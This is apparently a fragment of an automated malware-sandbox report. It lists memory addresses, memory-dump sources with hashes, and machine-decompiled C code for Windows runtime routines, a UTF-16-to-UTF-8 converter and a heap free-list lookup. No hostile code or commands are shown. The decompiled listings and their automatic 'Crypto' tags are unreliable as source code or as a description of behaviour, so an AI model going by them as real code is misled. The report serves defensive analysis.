                                  0x1e3a0e27
                                  0x1e3a0e2a
                                  0x1e3a0e2d
                                  0x1e3a0e30
                                  0x1e3a0e36
                                  0x1e3a1040
                                  0x1e3a1043
                                  0x1e3a1049
                                  0x1e3a1049
                                  0x1e3a0e3c
                                  0x1e3a0e3f
                                  0x1e3a1007
                                  0x1e3a100a
                                  0x1e3a1010
                                  0x1e3a1010
                                  0x1e3a100a
                                  0x1e3a0e3f
                                  0x1e3a0e58
                                  0x1e3a0e5d
                                  0x1e3a1000
                                  0x1e3a0e63
                                  0x1e3a0e63
                                  0x1e3a0e63
                                  0x1e3a0e67
                                  0x1e3a0e69
                                  0x1e3a0e69
                                  0x1e3a0e6d
                                  0x1e3a0e70
                                  0x1e3a0e74
                                  0x1e3a0e76
                                  0x1e3a0e76
                                  0x1e3a0e7a
                                  0x1e3a0e7c
                                  0x1e3a0e7c
                                  0x1e3a0e83
                                  0x1e3a0e86
                                  0x1e3a0e87
                                  0x1e3a0e89
                                  0x1e3a0e8b
                                  0x1e3a0e91
                                  0x1e3a0e00
                                  0x1e3a0e03
                                  0x1e3a0e03
                                  0x1e3a0e07
                                  0x1e3a0e0f
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x1e3a0e0f
                                  0x1e3a0e97
                                  0x1e3a0e9c
                                  0x1e3a113e
                                  0x1e3a1141
                                  0x1e3a1143
                                  0x1e3a0eb1
                                  0x1e3a0eb1
                                  0x1e3a0eb4
                                  0x1e3a0eb6
                                  0x1e3a1110
                                  0x1e3a1112
                                  0x1e3fea25
                                  0x1e3fea25
                                  0x1e3a0ec3
                                  0x1e3a0ec3
                                  0x1e3a0ecb
                                  0x1e3a10fe
                                  0x1e3a0ed1
                                  0x1e3a0ed1
                                  0x1e3a0ed1
                                  0x1e3a0ed3
                                  0x1e3a0edb
                                  0x1e3fea2d
                                  0x1e3fea2f
                                  0x1e3fea31
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x1e3fea37
                                  0x1e3fea37
                                  0x1e3fea3a
                                  0x1e3fea3e
                                  0x1e3fea47
                                  0x1e3fea4a
                                  0x1e3fea4c
                                  0x1e3fea4d
                                  0x1e3fea4d
                                  0x1e3fea4e
                                  0x1e3fea4e
                                  0x1e3fea51
                                  0x1e3fea52
                                  0x1e3fea52
                                  0x00000000
                                  0x1e3a0ee1
                                  0x1e3a0ee1
                                  0x1e3a0ee1
                                  0x1e3a0ee3
                                  0x1e3a0ee3
                                  0x1e3a0ee6
                                  0x1e3a0eec
                                  0x1e3fea5b
                                  0x1e3fea5d
                                  0x1e3a0ef6
                                  0x1e3a0ef8
                                  0x1e3fea6f
                                  0x1e3fea6f
                                  0x1e3a0efe
                                  0x1e3a0efe
                                  0x1e3a0f03
                                  0x1e3fea7b
                                  0x1e3fea7d
                                  0x00000000
                                  0x00000000
                                  0x1e3fea83
                                  0x1e3fea85
                                  0x00000000
                                  0x00000000
                                  0x1e3fea8b
                                  0x1e3fea91
                                  0x00000000
                                  0x00000000
                                  0x1e3fea97
                                  0x1e3fea9a
                                  0x1e3feaa0
                                  0x1e3feaa2
                                  0x1e3feaa2
                                  0x1e3feaae
                                  0x1e3feab3
                                  0x1e3feab6
                                  0x1e3feabf
                                  0x1e3feaca
                                  0x1e3feacd
                                  0x1e3fead1
                                  0x1e3fead1
                                  0x1e3feab8
                                  0x1e3feab8
                                  0x1e3feab8
                                  0x1e3fead2
                                  0x1e3fead9
                                  0x1e3a0f0e
                                  0x1e3a0f15
                                  0x1e3a0f17
                                  0x1e3a0f17
                                  0x1e3a0f1e
                                  0x1e3a0f23
                                  0x1e3feae1
                                  0x1e3feae1
                                  0x1e3a0f38
                                  0x1e3a0f3a
                                  0x1e3a0f3a
                                  0x1e3a0f49
                                  0x1e3a1108
                                  0x1e3a1108
                                  0x1e3a0f5b
                                  0x1e3a10c7
                                  0x1e3a10ca
                                  0x1e3a10cc
                                  0x00000000
                                  0x00000000
                                  0x1e3a10dc
                                  0x1e3a10de
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x1e3a0f61
                                  0x1e3a0f61
                                  0x1e3a0f61
                                  0x1e3a0f67
                                  0x1e3a0f6b
                                  0x1e3a111d
                                  0x1e3a111d
                                  0x1e3a0f75
                                  0x1e3a0f77
                                  0x1e3a0f77
                                  0x1e3a0f85
                                  0x1e3a0f8b
                                  0x1e3a10b9
                                  0x1e3a10bc
                                  0x1e3feae9
                                  0x1e3feae9
                                  0x1e3a0f91
                                  0x1e3a0f91
                                  0x1e3a0f91
                                  0x1e3a0f96
                                  0x1e3a0f98
                                  0x1e3a0f9a
                                  0x1e3a0f9a
                                  0x1e3a0fa6
                                  0x1e3a107c
                                  0x1e3a107f
                                  0x1e3a108d
                                  0x00000000
                                  0x1e3a108d
                                  0x1e3a1081
                                  0x1e3a1087
                                  0x1e3feaf4
                                  0x1e3feafa
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x1e3feb00
                                  0x00000000
                                  0x1e3a0fac
                                  0x1e3a0fac
                                  0x00000000
                                  0x1e3a0fac
                                  0x1e3a0fa6
                                  0x1e3a0f5b
                                  0x1e3a0f09
                                  0x1e3a0f09
                                  0x00000000
                                  0x1e3a0f09
                                  0x1e3fea63
                                  0x00000000
                                  0x1e3fea63
                                  0x1e3a0ef4
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x1e3a0ef4
                                  0x1e3a0ebc
                                  0x1e3a0ebc
                                  0x00000000
                                  0x1e3a0ebc
                                  0x1e3a0eb6
                                  0x1e3a1149
                                  0x1e3a114c
                                  0x1e3a114d
                                  0x00000000
                                  0x1e3a114d
                                  0x1e3a0ea4
                                  0x1e3a0ea7
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x1e3a0fb7
                                  0x1e3a0fb7
                                  0x1e3a0fbc
                                  0x1e3a0fc9
                                  0x1e3a0fc9
                                  0x1e3a0fce
                                  0x1e3a1020
                                  0x1e3a1025
                                  0x1e3a1094
                                  0x1e3a1094
                                  0x1e3a1099
                                  0x1e3fea04
                                  0x1e3fea04
                                  0x1e3fea09
                                  0x1e3fea1c
                                  0x1e3fea0b
                                  0x1e3fea0b
                                  0x1e3fea0e
                                  0x1e3fea14
                                  0x1e3fea14
                                  0x1e3fea0e
                                  0x1e3fea09
                                  0x1e3a1027
                                  0x1e3a1027
                                  0x1e3a1155
                                  0x1e3a102d
                                  0x1e3a102d
                                  0x1e3a102d
                                  0x1e3a1032
                                  0x1e3fe9fc
                                  0x1e3fe9fc
                                  0x1e3a1032
                                  0x1e3a1027
                                  0x00000000
                                  0x1e3a1025
                                  0x1e3a0fd0
                                  0x1e3fe9f4
                                  0x00000000
                                  0x1e3fe9f4
                                  0x1e3a0fd6
                                  0x1e3a0fd9
                                  0x1e3a1059
                                  0x1e3a1059
                                  0x1e3a105e
                                  0x1e3fe9ec
                                  0x1e3a1064
                                  0x1e3a1064
                                  0x1e3a1064
                                  0x1e3a1069
                                  0x1e3a10ac
                                  0x1e3a106b
                                  0x1e3a106b
                                  0x1e3a106e
                                  0x1e3a1074
                                  0x1e3a1074
                                  0x1e3a106e
                                  0x1e3a1069
                                  0x00000000
                                  0x1e3a105e
                                  0x1e3a0fdb
                                  0x1e3a10a4
                                  0x00000000
                                  0x1e3a10a4
                                  0x1e3a0fe1
                                  0x1e3a0fe4
                                  0x00000000
                                  0x00000000
                                  0x1e3a0fea
                                  0x1e3a0ff1
                                  0x00000000
                                  0x1e3a0ff8
                                  0x00000000
                                  0x00000000
                                  0x1e3fe9e4
                                  0x00000000
                                  0x00000000
                                  0x1e3a1018
                                  0x00000000
                                  0x00000000
                                  0x1e3a1051
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x1e3a0ff1
                                  0x1e3a0fbe
                                  0x1e3a0fc3
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x1e3a0fc3
                                  0x1e3a0df3
                                  0x1e3fe9d5
                                  0x1e3fe9d7
                                  0x1e3a1128
                                  0x1e3a1128
                                  0x1e3a112b
                                  0x1e3a112d
                                  0x1e3a1133
                                  0x1e3a1133
                                  0x00000000
                                  0x1e3a112d
                                  0x00000000
                                  0x1e3fe9d7
                                  0x1e3a0dc2
                                  0x1e3a10f6
                                  0x1e3a0dd4
                                  0x1e3a0dd7
                                  0x1e3a0dda
                                  0x1e3a0de8
                                  0x1e3a0de9
                                  0x1e3a0de9
                                  0x1e3a0dda
                                  0x00000000
                                  0x1e3a0dc2
                                  0x1e3a0dac
                                  0x1e3a0dae
                                  0x1e3a0db3
                                  0x00000000
                                  0x00000000
                                  0x00000000

                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.421351071.000000001E380000.00000040.00000001.sdmp, Offset: 1E380000, based on PE: true
                                  • Associated: 0000000C.00000002.421631214.000000001E49B000.00000040.00000001.sdmp Download File
                                  • Associated: 0000000C.00000002.421651645.000000001E49F000.00000040.00000001.sdmp Download File
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 66d3f00646f9225503ad99a059ca1b3a192abb00ffb62dae1ac5b5f8f6d3e209
                                  • Instruction ID: 88f218f0039f003e96c1d8a2eb9c9e775ce3d876f32cb603a9c7f160fa2be351
                                  • Opcode Fuzzy Hash: 66d3f00646f9225503ad99a059ca1b3a192abb00ffb62dae1ac5b5f8f6d3e209
                                  • Instruction Fuzzy Hash: 96D18C71E046598BDB08CE9AC5A07AEFBF6EFC4350F108369E642E6285D77889C1CF51
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00081072, Relevance: .3, Instructions: 319COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.415891175.0000000000080000.00000040.00000001.sdmp, Offset: 00080000, based on PE: false
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 9bd5b00ee3b6eabd0e3de86aad9f9d0f09f4f1af72fed8bcd37219608a816d6e
                                  • Instruction ID: 194b6fe6391df87c9c77b9c9f5e5ba1a4d22c44b092c3f2c44ca5da5cd63615d
                                  • Opcode Fuzzy Hash: 9bd5b00ee3b6eabd0e3de86aad9f9d0f09f4f1af72fed8bcd37219608a816d6e
                                  • Instruction Fuzzy Hash: 2AB14671224A488FDB59FF24C885EEA73E4FF94315F40056DA59BCB151EF30AA45CB82
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00081069, Relevance: .3, Instructions: 312COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.415891175.0000000000080000.00000040.00000001.sdmp, Offset: 00080000, based on PE: false
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 8e229fdfb3e99d5020f13157f074746f72344f2fb3f0950de1dd59389c2ec612
                                  • Instruction ID: 01f32925e9b16bd9eb761ec553ba2a7ba4c3bdca2493c76546400a5bee8d67cf
                                  • Opcode Fuzzy Hash: 8e229fdfb3e99d5020f13157f074746f72344f2fb3f0950de1dd59389c2ec612
                                  • Instruction Fuzzy Hash: 02B15571224A498FDB59FF24C885EEAB3E4FF94304F40056EA59BCB151DF30AA45CB82
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 1E3DEBB0, Relevance: .2, Instructions: 250COMMONCrypto
                                  Download Yara Rule
                                  C-Code - Quality: 100%
                                  			E1E3DEBB0(signed int* _a4, intOrPtr _a8, intOrPtr* _a12, signed short* _a16, unsigned int _a20) {
				signed short* _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				unsigned int _v20;
				intOrPtr _t42;
				unsigned int _t43;
				unsigned int _t50;
				signed char _t56;
				signed char _t60;
				signed int _t63;
				signed int _t73;
				signed int _t77;
				signed int _t80;
				unsigned int _t82;
				signed int _t87;
				signed int _t91;
				signed short _t96;
				signed short* _t98;
				signed char _t100;
				signed int* _t102;
				signed short* _t105;
				intOrPtr _t106;
				signed int _t108;
				signed int* _t110;
				void* _t113;
				signed int _t115;
				signed short* _t117;
				signed int _t118;

				_t98 = _a16;
				_t87 = 0;
				_v16 = 0;
				if(_t98 == 0) {
					return 0xc00000f2;
				}
				_t110 = _a4;
				if(_t110 == 0) {
					if(_a12 == 0) {
						_t42 = 0xc000000d;
					} else {
						_t42 = E1E3DED1A(_t98, _a20, _a12);
					}
					L19:
					return _t42;
				}
				_t43 = _a20;
				if((_t43 & 0x00000001) != 0) {
					_t42 = 0xc00000f3;
					goto L19;
				} else {
					_t102 = _t110;
					_t105 =  &(_t98[_t43 >> 1]);
					_v8 = _t105;
					_v12 = _a8 + _t110;
					L4:
					while(1) {
						L4:
						while(1) {
							L4:
							if(_t98 >= _t105) {
								if(_t87 == 0) {
									L17:
									_t106 = _v16;
									L18:
									_t42 = _t106;
									 *_a12 = _t102 - _a4;
									goto L19;
								}
								L8:
								_t13 = _t87 - 0xd800; // -55295
								if(_t13 <= 0x7ff) {
									_v16 = 0x107;
									_t87 = 0xfffd;
								}
								_t113 = 1;
								if(_t87 > 0x7f) {
									if(_t87 > 0x7ff) {
										if(_t87 > 0xffff) {
											_t113 = 2;
										}
										_t113 = _t113 + 1;
									}
									_t113 = _t113 + 1;
								}
								if(_t102 > _v12 - _t113) {
									_t106 = 0xc0000023;
									goto L18;
								} else {
									if(_t87 > 0x7f) {
										_t50 = _t87;
										if(_t87 > 0x7ff) {
											if(_t87 > 0xffff) {
												 *_t102 = _t50 >> 0x00000012 | 0x000000f0;
												_t102 =  &(_t102[0]);
												_t56 = _t87 >> 0x0000000c & 0x0000003f | 0x00000080;
											} else {
												_t56 = _t50 >> 0x0000000c | 0x000000e0;
											}
											 *_t102 = _t56;
											_t102 =  &(_t102[0]);
											_t60 = _t87 >> 0x00000006 & 0x0000003f | 0x00000080;
										} else {
											_t60 = _t50 >> 0x00000006 | 0x000000c0;
										}
										 *_t102 = _t60;
										_t102 =  &(_t102[0]);
										_t87 = _t87 & 0x0000003f | 0x00000080;
									}
									 *_t102 = _t87;
									_t102 =  &(_t102[0]);
									_t63 = _t105 - _t98 >> 1;
									_t115 = _v12 - _t102;
									if(_t63 > 0xd) {
										if(_t115 < _t63) {
											_t63 = _t115;
										}
										_t22 = _t63 - 5; // -5
										_t117 =  &(_t98[_t22]);
										if(_t98 < _t117) {
											do {
												_t91 =  *_t98 & 0x0000ffff;
												_t100 =  &(_t98[1]);
												if(_t91 > 0x7f) {
													L58:
													if(_t91 > 0x7ff) {
														_t38 = _t91 - 0xd800; // -55296
														if(_t38 <= 0x7ff) {
															if(_t91 > 0xdbff) {
																_t98 = _t100 - 2;
																break;
															}
															_t108 =  *_t100 & 0x0000ffff;
															_t98 = _t100 + 2;
															_t39 = _t108 - 0xdc00; // -54273
															if(_t39 > 0x3ff) {
																_t98 = _t98 - 4;
																break;
															}
															_t91 = (_t91 << 0xa) + 0xfca02400 + _t108;
															 *_t102 = _t91 >> 0x00000012 | 0x000000f0;
															_t102 =  &(_t102[0]);
															_t73 = _t91 & 0x0003f000 | 0x00080000;
															L65:
															_t117 = _t117 - 2;
															 *_t102 = _t73 >> 0xc;
															_t102 =  &(_t102[0]);
															_t77 = _t91 & 0x00000fc0 | 0x00002000;
															L66:
															 *_t102 = _t77 >> 6;
															_t117 = _t117 - 2;
															_t102[0] = _t91 & 0x0000003f | 0x00000080;
															_t102 =  &(_t102[0]);
															goto L30;
														}
														_t73 = _t91 | 0x000e0000;
														goto L65;
													}
													_t77 = _t91 | 0x00003000;
													goto L66;
												}
												 *_t102 = _t91;
												_t102 =  &(_t102[0]);
												if((_t100 & 0x00000002) != 0) {
													_t91 =  *_t100 & 0x0000ffff;
													_t100 = _t100 + 2;
													if(_t91 > 0x7f) {
														goto L58;
													}
													 *_t102 = _t91;
													_t102 =  &(_t102[0]);
												}
												if(_t100 >= _t117) {
													break;
												} else {
													goto L28;
												}
												while(1) {
													L28:
													_t80 =  *(_t100 + 4);
													_t96 =  *_t100;
													_v20 = _t80;
													if(((_t80 | _t96) & 0xff80ff80) != 0) {
														break;
													}
													_t82 = _v20;
													_t100 = _t100 + 8;
													 *_t102 = _t96;
													_t102[0] = _t82;
													_t102[0] = _t96 >> 0x10;
													_t102[0] = _t82 >> 0x10;
													_t102 =  &(_t102[1]);
													if(_t100 < _t117) {
														continue;
													}
													goto L30;
												}
												_t91 = _t96 & 0x0000ffff;
												_t100 = _t100 + 2;
												if(_t91 > 0x7f) {
													goto L58;
												}
												 *_t102 = _t91;
												_t102 =  &(_t102[0]);
												L30:
											} while (_t98 < _t117);
											_t105 = _v8;
										}
										goto L32;
									} else {
										if(_t115 < _t63) {
											L32:
											_t87 = 0;
											continue;
										}
										while(_t98 < _t105) {
											_t87 =  *_t98 & 0x0000ffff;
											_t98 =  &(_t98[1]);
											if(_t87 > 0x7f) {
												L7:
												_t12 = _t87 - 0xd800; // -55290
												if(_t12 <= 0x3ff) {
													goto L4;
												}
												goto L8;
											}
											 *_t102 = _t87;
											_t102 =  &(_t102[0]);
										}
										goto L17;
									}
								}
							}
							_t118 =  *_t98 & 0x0000ffff;
							if(_t87 != 0) {
								_t36 = _t118 - 0xdc00; // -56314
								if(_t36 <= 0x3ff) {
									_t87 = (_t87 << 0xa) + 0xfca02400 + _t118;
									_t98 =  &(_t98[1]);
								}
								goto L8;
							}
							_t87 = _t118;
							_t98 =  &(_t98[1]);
							goto L7;
						}
					}
				}
			}































                                  0x1e3debb8
                                  0x1e3debbf
                                  0x1e3debc1
                                  0x1e3debc6
                                  0x00000000
                                  0x1e41b6d6
                                  0x1e3debcd
                                  0x1e3debd2
                                  0x1e3dec95
                                  0x1e41b6e0
                                  0x1e3dec9b
                                  0x1e3deca1
                                  0x1e3deca1
                                  0x1e3dec89
                                  0x00000000
                                  0x1e3dec89
                                  0x1e3debd8
                                  0x1e3debdd
                                  0x1e41b6ea
                                  0x00000000
                                  0x1e3debe3
                                  0x1e3debe5
                                  0x1e3debe7
                                  0x1e3debef
                                  0x1e3debf2
                                  0x00000000
                                  0x1e3debf5
                                  0x00000000
                                  0x1e3debf5
                                  0x1e3debf5
                                  0x1e3debf7
                                  0x1e41b6f6
                                  0x1e3dec7c
                                  0x1e3dec7c
                                  0x1e3dec7f
                                  0x1e3dec82
                                  0x1e3dec87
                                  0x00000000
                                  0x1e3dec87
                                  0x1e3dec1a
                                  0x1e3dec1a
                                  0x1e3dec25
                                  0x1e41b725
                                  0x1e41b72c
                                  0x1e41b72c
                                  0x1e3dec2d
                                  0x1e3dec31
                                  0x1e41b73c
                                  0x1e41b744
                                  0x1e41b748
                                  0x1e41b748
                                  0x1e41b749
                                  0x1e41b749
                                  0x1e41b74a
                                  0x1e41b74a
                                  0x1e3dec3e
                                  0x1e41b860
                                  0x00000000
                                  0x1e3dec44
                                  0x1e3dec47
                                  0x1e41b750
                                  0x1e41b758
                                  0x1e41b767
                                  0x1e41b775
                                  0x1e41b77c
                                  0x1e41b77f
                                  0x1e41b769
                                  0x1e41b76c
                                  0x1e41b76c
                                  0x1e41b781
                                  0x1e41b788
                                  0x1e41b78b
                                  0x1e41b75a
                                  0x1e41b75d
                                  0x1e41b75d
                                  0x1e41b78d
                                  0x1e41b792
                                  0x1e41b793
                                  0x1e41b793
                                  0x1e3dec54
                                  0x1e3dec56
                                  0x1e3dec57
                                  0x1e3dec59
                                  0x1e3dec5e
                                  0x1e3decaa
                                  0x1e3ded16
                                  0x1e3ded16
                                  0x1e3decac
                                  0x1e3decaf
                                  0x1e3decb4
                                  0x1e3decb6
                                  0x1e3decb6
                                  0x1e3decb9
                                  0x1e3decbf
                                  0x1e41b7c1
                                  0x1e41b7c8
                                  0x1e41b7d3
                                  0x1e41b7db
                                  0x1e41b7ec
                                  0x1e41b858
                                  0x00000000
                                  0x1e41b858
                                  0x1e41b7ee
                                  0x1e41b7f1
                                  0x1e41b7f4
                                  0x1e41b7ff
                                  0x1e41b850
                                  0x00000000
                                  0x1e41b850
                                  0x1e41b80a
                                  0x1e41b813
                                  0x1e41b81c
                                  0x1e41b81d
                                  0x1e41b822
                                  0x1e41b825
                                  0x1e41b828
                                  0x1e41b831
                                  0x1e41b832
                                  0x1e41b837
                                  0x1e41b840
                                  0x1e41b842
                                  0x1e41b845
                                  0x1e41b848
                                  0x00000000
                                  0x1e41b848
                                  0x1e41b7df
                                  0x00000000
                                  0x1e41b7df
                                  0x1e41b7cc
                                  0x00000000
                                  0x1e41b7cc
                                  0x1e3decc5
                                  0x1e3decc7
                                  0x1e3deccb
                                  0x1e41b79b
                                  0x1e41b79e
                                  0x1e41b7a4
                                  0x00000000
                                  0x00000000
                                  0x1e41b7a6
                                  0x1e41b7a8
                                  0x1e41b7a8
                                  0x1e3decd3
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x1e3decd5
                                  0x1e3decd5
                                  0x1e3decd5
                                  0x1e3decd8
                                  0x1e3decda
                                  0x1e3dece4
                                  0x00000000
                                  0x00000000
                                  0x1e3decea
                                  0x1e3deced
                                  0x1e3decf0
                                  0x1e3decf2
                                  0x1e3decfb
                                  0x1e3decfe
                                  0x1e3ded01
                                  0x1e3ded06
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x1e3ded06
                                  0x1e41b7ae
                                  0x1e41b7b1
                                  0x1e41b7b7
                                  0x00000000
                                  0x00000000
                                  0x1e41b7b9
                                  0x1e41b7bb
                                  0x1e3ded08
                                  0x1e3ded08
                                  0x1e3ded0c
                                  0x1e3ded0c
                                  0x00000000
                                  0x1e3dec60
                                  0x1e3dec62
                                  0x1e3ded0f
                                  0x1e3ded0f
                                  0x00000000
                                  0x1e3ded0f
                                  0x1e3dec68
                                  0x1e3dec6c
                                  0x1e3dec6f
                                  0x1e3dec75
                                  0x1e3dec0d
                                  0x1e3dec0d
                                  0x1e3dec18
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x1e3dec18
                                  0x1e3dec77
                                  0x1e3dec79
                                  0x1e3dec79
                                  0x00000000
                                  0x1e3dec68
                                  0x1e3dec5e
                                  0x1e3dec3e
                                  0x1e3debfd
                                  0x1e3dec02
                                  0x1e41b701
                                  0x1e41b70c
                                  0x1e41b71b
                                  0x1e41b71d
                                  0x1e41b71d
                                  0x00000000
                                  0x1e41b70c
                                  0x1e3dec08
                                  0x1e3dec0a
                                  0x00000000
                                  0x1e3dec0a
                                  0x1e3debf5
                                  0x1e3debf5

                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.421351071.000000001E380000.00000040.00000001.sdmp, Offset: 1E380000, based on PE: true
                                  • Associated: 0000000C.00000002.421631214.000000001E49B000.00000040.00000001.sdmp Download File
                                  • Associated: 0000000C.00000002.421651645.000000001E49F000.00000040.00000001.sdmp Download File
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 9fa993315481d34d861e67938bc03e7c42d4ca2921a7b7b75938bf6aa423f69f
                                  • Instruction ID: 097d4783adac6b5c0d9c765eb96a3231d038b0de44955d8a77c44c8750b91851
                                  • Opcode Fuzzy Hash: 9fa993315481d34d861e67938bc03e7c42d4ca2921a7b7b75938bf6aa423f69f
                                  • Instruction Fuzzy Hash: 34812732E08396CFEB114F6AC8C0259BF56FF52600B68477BE9528F741C265B84AD7A1
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 1E3CAB40, Relevance: .2, Instructions: 240COMMONCrypto
                                  Download Yara Rule
                                  C-Code - Quality: 91%
                                  			E1E3CAB40(intOrPtr __ecx, intOrPtr* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				intOrPtr _v8;
				signed short _v12;
				signed int _v16;
				intOrPtr _v20;
				intOrPtr* _v24;
				intOrPtr* _v28;
				intOrPtr _t69;
				intOrPtr* _t70;
				intOrPtr _t71;
				intOrPtr _t73;
				void* _t74;
				signed int _t77;
				signed int _t79;
				signed int _t82;
				signed int _t88;
				unsigned int _t97;
				unsigned int _t99;
				unsigned int _t105;
				unsigned int _t107;
				intOrPtr* _t111;
				unsigned int _t118;
				void* _t123;
				intOrPtr _t127;
				signed int _t128;
				void* _t131;
				signed char _t136;
				signed char _t141;
				signed char _t146;
				signed int _t151;
				signed int _t153;
				unsigned int _t155;
				intOrPtr _t158;
				void* _t164;
				signed short _t167;
				void* _t171;
				void* _t173;
				intOrPtr* _t175;
				intOrPtr* _t178;
				signed short _t180;
				signed short _t182;

				_t149 = __ecx;
				_t111 =  *((intOrPtr*)(__edx + 0x18));
				_v24 = __edx;
				_t69 =  *((intOrPtr*)(_t111 + 4));
				_t158 = _a12;
				_v8 = __ecx;
				_v16 = _a8 -  *((intOrPtr*)(__edx + 0x14));
				_v28 = _t111;
				if(_t111 == _t69) {
					L7:
					_t70 = _t111;
					goto L8;
				} else {
					_t127 = _a4;
					if(_t127 == 0) {
						_t171 = _t158 -  *((intOrPtr*)(_t69 + 0x14));
					} else {
						_t182 =  *(_t69 - 8);
						_v20 = _t69 + 0xfffffff8;
						if( *((intOrPtr*)(__ecx + 0x4c)) != 0) {
							_t105 =  *(__ecx + 0x50) ^ _t182;
							_v12 = _t105;
							_t107 = _v12;
							_t146 = _t105 >> 0x00000010 ^ _t105 >> 0x00000008 ^ _t107;
							if(_t107 >> 0x18 != _t146) {
								_push(_t146);
								E1E46A80D(__ecx, _v20, 0, 0);
								_t149 = _v8;
							}
							_t182 = _v12;
							_t127 = _a4;
						}
						_t171 = _t158 - (_t182 & 0x0000ffff);
					}
					if(_t171 <= 0) {
						_t71 =  *_t111;
						if(_t127 == 0) {
							_t173 = _t158 -  *((intOrPtr*)(_t71 + 0x14));
						} else {
							_t180 =  *(_t71 - 8);
							_v20 = _t71 + 0xfffffff8;
							if( *((intOrPtr*)(_t149 + 0x4c)) != 0) {
								_t97 =  *(_t149 + 0x50) ^ _t180;
								_v12 = _t97;
								_t99 = _v12;
								_t141 = _t97 >> 0x00000010 ^ _t97 >> 0x00000008 ^ _t99;
								if(_t99 >> 0x18 != _t141) {
									_push(_t141);
									E1E46A80D(_t149, _v20, 0, 0);
									_t149 = _v8;
								}
								_t180 = _v12;
								_t127 = _a4;
							}
							_t173 = _t158 - (_t180 & 0x0000ffff);
						}
						if(_t173 <= 0) {
							return  *_t111;
						} else {
							_t175 = _v24;
							if( *_t175 != 0 || _a8 !=  *((intOrPtr*)(_t175 + 4)) - 1) {
								_t128 = _v16;
								_t73 =  *((intOrPtr*)(_t175 + 0x1c));
								_t151 = _t128 >> 5;
								_t164 = ( *((intOrPtr*)(_t175 + 4)) -  *((intOrPtr*)(_t175 + 0x14)) >> 5) - 1;
								_t118 =  !((1 << (_t128 & 0x0000001f)) - 1) &  *(_t73 + _t151 * 4);
								_t74 = _t73 + _t151 * 4;
								if(1 == 0) {
									while(_t151 <= _t164) {
										_t118 =  *(_t74 + 4);
										_t74 = _t74 + 4;
										_t151 = _t151 + 1;
										if(_t118 == 0) {
											continue;
										} else {
											goto L28;
										}
										goto L51;
									}
									if(_t118 != 0) {
										goto L28;
									} else {
										goto L40;
									}
								} else {
									L28:
									if(_t118 == 0) {
										_t77 = _t118 >> 0x00000010 & 0x000000ff;
										if(_t77 != 0) {
											_t79 = ( *(_t77 + 0x1e3884d0) & 0x000000ff) + 0x10;
										} else {
											_t57 = (_t118 >> 0x18) + 0x1e3884d0; // 0x10008
											_t79 = ( *_t57 & 0x000000ff) + 0x18;
										}
									} else {
										_t82 = _t118 & 0x000000ff;
										if(_t118 == 0) {
											_t79 = ( *((_t118 >> 0x00000008 & 0x000000ff) + 0x1e3884d0) & 0x000000ff) + 8;
										} else {
											_t79 =  *(_t82 + 0x1e3884d0) & 0x000000ff;
										}
									}
									_t153 = (_t151 << 5) + _t79;
									if( *((intOrPtr*)(_t175 + 8)) != 0) {
										_t153 = _t153 + _t153;
									}
									_t70 =  *((intOrPtr*)( *((intOrPtr*)(_t175 + 0x20)) + _t153 * 4));
									L8:
									return _t70;
								}
							} else {
								_t88 = _v16;
								if( *((intOrPtr*)(_t175 + 8)) != 0) {
									_t88 = _t88 + _t88;
								}
								_t178 =  *((intOrPtr*)( *((intOrPtr*)(_t175 + 0x20)) + _t88 * 4));
								if(_t111 == _t178) {
									L40:
									return 0;
								} else {
									do {
										if(_t127 == 0) {
											_t131 = _t158 -  *((intOrPtr*)(_t178 + 0x14));
										} else {
											_t167 =  *(_t178 - 8);
											_t123 = _t178 - 8;
											if( *((intOrPtr*)(_t149 + 0x4c)) != 0) {
												_t155 =  *(_t149 + 0x50) ^ _t167;
												_t167 = _t155;
												_t136 = _t155 >> 0x00000010 ^ _t155 >> 0x00000008 ^ _t155;
												_t149 = _v8;
												if(_t155 >> 0x18 != _t136) {
													_push(_t136);
													E1E46A80D(_t149, _t123, 0, 0);
													_t149 = _v8;
												}
											}
											_t111 = _v28;
											_t158 = _a12;
											_t131 = _t158 - (_t167 & 0x0000ffff);
										}
										if(_t131 <= 0) {
											return _t178;
										} else {
											goto L24;
										}
										goto L51;
										L24:
										_t178 =  *_t178;
										_t127 = _a4;
									} while (_t111 != _t178);
									goto L40;
								}
							}
						}
					} else {
						goto L7;
					}
				}
				L51:
			}











































                                  0x1e3cab4a
                                  0x1e3cab51
                                  0x1e3cab57
                                  0x1e3cab5b
                                  0x1e3cab5e
                                  0x1e3cab61
                                  0x1e3cab64
                                  0x1e3cab67
                                  0x1e3cab6c
                                  0x1e3cabbb
                                  0x1e3cabbb
                                  0x00000000
                                  0x1e3cab6e
                                  0x1e3cab6e
                                  0x1e3cab73
                                  0x1e3cad70
                                  0x1e3cab79
                                  0x1e3cab79
                                  0x1e3cab83
                                  0x1e3cab86
                                  0x1e3cab8b
                                  0x1e3cab8f
